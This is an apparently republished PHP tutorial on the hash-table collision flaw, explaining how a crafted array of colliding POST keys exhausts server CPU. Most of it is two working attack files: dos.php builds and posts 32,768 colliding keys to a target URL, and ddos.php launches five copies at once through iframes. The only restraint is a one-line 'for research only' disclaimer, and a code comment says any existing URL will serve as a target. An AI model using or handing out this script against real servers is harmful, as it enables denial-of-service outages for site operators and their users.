Analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks, hashddos_PHP tutorial

Analysis of the method of PHP using hash conflict vulnerability to carry out DDoS attacks, hashddos

This article analyzes the method of PHP using hash conflict vulnerability to carry out DDoS attack. Share it with everyone for your reference. The specific analysis is as follows:

First of all, a statement: The content of this article is only for research and study, please do not use it for illegal activities!

As mentioned earlier, the hash table collision vulnerability has recently been exposed. Many common languages ​​including java, python, php, etc. have not been spared. Let’s take a look at its power tonight.

Attack principle:

By posting a set of carefully assembled array parameters to the target server, when the bottom layer of the language processes the received array parameters after reaching the server, the existence of this vulnerability causes a large amount of CPU consumption, eventually leading to the exhaustion of server resources.
No fancy tricks are needed, just use PHP to simply implement it and see the effect, just click on it.

File: dos.php

// 目标地址 
// 只要目标地址存在，不用管它是干嘛的 
$host = 'http://127.0.0.1/test.php';
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
  $data .= '&array[' . $key . ']=0';
}
$ret = curl($host, ltrim($data,'&')); 
var_dump($ret); 
function curl($url, $post, $timeout = 30){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); 
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  $output = curl_exec($ch);
  if ($output === false) return false;
  $info = curl_getinfo($ch);
  $http_code = $info['http_code'];
  if ($http_code == 404) return false;
  curl_close($ch);
  return $output;
}

File: ddos.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>DDOS</title> 
</head> 
<body> 
<&#63;php 
for($i=0; $i<5; $i++){//并发数 
  echo '<iframe src="dos.php&#63;a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; 
} 
&#63;> 
</body> 
</html>

I hope this article will be helpful to everyone’s PHP programming design.

http://www.bkjia.com/PHPjc/974680.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/974680.htmlTechArticleAnalysis of PHP's use of hash conflict vulnerabilities to carry out DDoS attacks, hashddos This article provides an example analysis of PHP's use of hash conflict vulnerabilities to carry out DDoS attacks. Method of attack. Share it with everyone for your reference. Specific points...